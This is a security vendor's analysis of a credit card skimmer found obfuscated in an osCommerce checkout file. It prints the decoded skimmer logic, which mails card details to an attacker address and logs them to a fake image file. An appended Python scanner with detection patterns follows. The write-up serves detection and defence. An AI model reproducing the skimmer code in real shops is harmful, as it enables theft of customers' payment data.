Credit Card Stealer on osCommerce

Labs Note

We regularly detect malware that targets payment modules on compromised ecommerce websites, mainly on Magento.

Recently we’ve stumbled upon the same threat on osCommerce. The malicious code was found inside ./catalog/checkout_confirmation.php and was obfuscated as shown below:

…eval(gzinflate(str_rot13(base64_decode('Dc9UsqJAAADQ43x/sRAQFHdJ5ByUBoTNRxMaVg0i0dPPvBu8ZYXdqfrWGGhjLkIZ/JRK5mJE5lBEnn5Dd7qA3zbFyNbzI47VvBPpQ…wSmhNUk33O2C+uFKeOUAGdb8UyETzPEp1nvg7hIgQB5355jGg9LQuJGxB31rYoBLc7LHDv0hwC8L3ocO4KlLduNn6ntts7EmJ1z1lZuZ4tFt4U12paYTRI+dIKnefP7+/vn38='))));…

When decoded, the code turned out to be a credit card stealer. It sends a copy of the stolen card details to the attacker’s email address and also appends them to an image file as a backup. This happens every time a customer submits payment details during the checkout process:

$recipient = "<attacker’s-email-address>@gmail.com";
$subject = "www.<compromised-site>.com";
$mailheaders = "From: www.<compromised-site>.com <sales@ www.<compromised-site>.com >";
$address4 = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '<br>');
$ip = getenv("REMOTE_ADDR");
…
$message .= "Name on card: ".$_POST['cc_owner']." CC: ".$_POST['cc_number']." Exp: ".$_POST['cc_expires_month']."/".$_POST['cc_expires_year']." CVV2: ".$_POST['cc_ccv']."\n";
…
mail($recipient, $subject, $message, $mailheaders);
$f = fopen('/<path to public directory>/catalog/images/oscommerce2.gif','a');
fputs($f, $message . "\n");
fclose($f);

If you’re using osCommerce as your ecommerce solution, regularly check your core files, especially ./catalog/checkout_confirmation.php, for any modified content, and run regular scans. As always, if you need a professional service for your osCommerce website, you can count on our Website AntiVirus service.
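As an added example (not code from the original post, from Sucuri, or from the osCommerce project), here is a small Python scanner that implements the check recommended above. It walks a directory of PHP files, peels the eval(gzinflate(str_rot13(base64_decode('...')))) wrapper with the same semantics PHP applies to each function, and then looks in the decoded payload for the traits the decoded skimmer showed: card fields read from $_POST, a mail() call, and a log file hidden under an image name. It goes a little beyond the single chain on the page by accepting any nesting of a few common wrapper functions. The function names, the indicator list, the script file name and the sample inputs are my own constructions; the sample payload is built at runtime for testing and is not the real skimmer.

```python
# Added example: scanner for eval()-wrapped, layered-encoded PHP like the osCommerce skimmer.
# Sample inputs are constructed for testing; nothing here is the original malicious file.
import base64
import re
import zlib


def rot13_bytes(data: bytes) -> bytes:
    """PHP str_rot13 on raw bytes: rotate ASCII letters only, leave every other byte alone."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


# Wrapper functions the chain may use, each undone with the semantics PHP gives that function.
DECODERS = {
    "base64_decode": lambda d: base64.b64decode(d),
    "str_rot13": rot13_bytes,
    "gzinflate": lambda d: zlib.decompress(d, -15),  # gzinflate() reads raw DEFLATE, no zlib header
    "gzuncompress": lambda d: zlib.decompress(d),    # gzuncompress() expects the zlib header
    "strrev": lambda d: d[::-1],
}

# eval( f1( f2( ... '<literal>' ) ... ) ) with any nesting of the functions above.
CHAIN_RE = re.compile(
    r"eval\s*\(\s*((?:(?:" + "|".join(DECODERS) + r")\s*\(\s*)+)'([^']*)'\s*\)+", re.S
)

# Traits of the decoded skimmer worth flagging (taken from the post's own decoded sample).
INDICATORS = {
    "card_field_from_post": r"\$_POST\[.cc_(?:number|owner|ccv|cvv|expires)",
    "mail_call": r"\bmail\s*\(",
    "log_hidden_as_image": r"fopen\s*\([^)]*\.(?:gif|jpe?g|png)['\"]",
}


def unwrap_layers(php_source: str, max_layers: int = 5):
    """Peel eval() wrappers in place until none remain.

    Returns (chains_found, text).  A chain whose blob cannot be decoded (truncated or
    corrupted) still counts as found; the returned text then carries the error instead.
    """
    text = php_source
    for n in range(max_layers):
        m = CHAIN_RE.search(text)
        if not m:
            return n, text
        funcs = re.findall(r"[a-z0-9_]+", m.group(1))  # outermost first: gzinflate, str_rot13, base64_decode
        data = m.group(2).encode("latin-1", "replace")
        try:
            for name in reversed(funcs):  # PHP evaluates the innermost call first
                data = DECODERS[name](data)
        except (ValueError, zlib.error) as exc:  # binascii.Error is a ValueError subclass
            return n + 1, f"<decode error in layer {n + 1}: {exc}>"
        text = text[:m.start()] + data.decode("latin-1") + text[m.end():]
    return max_layers, text


def scan(php_source: str) -> dict:
    """Classify one PHP source text: suspicious if it carries an eval chain or skimmer traits."""
    layers, payload = unwrap_layers(php_source)
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, payload))
    return {"obfuscated": layers > 0, "layers": layers, "indicators": hits,
            "suspicious": layers > 0 or bool(hits)}


def encode_layers(payload: str) -> str:
    """Inverse of the page's chain (raw deflate -> rot13 -> base64); used only to build test input."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(payload.encode("latin-1")) + comp.flush()
    return base64.b64encode(rot13_bytes(raw)).decode("ascii")


def build_sample(payload: str) -> str:
    """Constructed PHP file wrapping `payload` the way the infected checkout_confirmation.php did."""
    return "<?php\neval(gzinflate(str_rot13(base64_decode('" + encode_layers(payload) + "'))));\n"


# Constructed payload carrying the traits from the post; not the real skimmer.
SAMPLE_PAYLOAD = "$m = 'CC: ' . $_POST['cc_number'];\nmail($r, $s, $m, $h);\n"
# Constructed clean excerpt of the same file, for a negative check.
BENIGN = "<?php\n$address = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '<br>');\n"

if __name__ == "__main__":
    import pathlib
    import sys
    if len(sys.argv) > 1:  # usage: python scan_eval_chain.py /path/to/catalog  (script name assumed)
        for path in pathlib.Path(sys.argv[1]).rglob("*.php"):
            result = scan(path.read_text("latin-1"))
            if result["suspicious"]:
                print(path, result)
    else:
        print(scan(build_sample(SAMPLE_PAYLOAD)))
```

Run it against the osCommerce document root to list every PHP file that either carries such an eval chain or, once decoded, reads card fields out of $_POST, calls mail(), or opens an image-named file for writing. A truncated or corrupted blob, like the shortened one quoted in the post, is still reported because the eval chain itself is the signal even when the payload cannot be recovered; a clean file is left alone.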
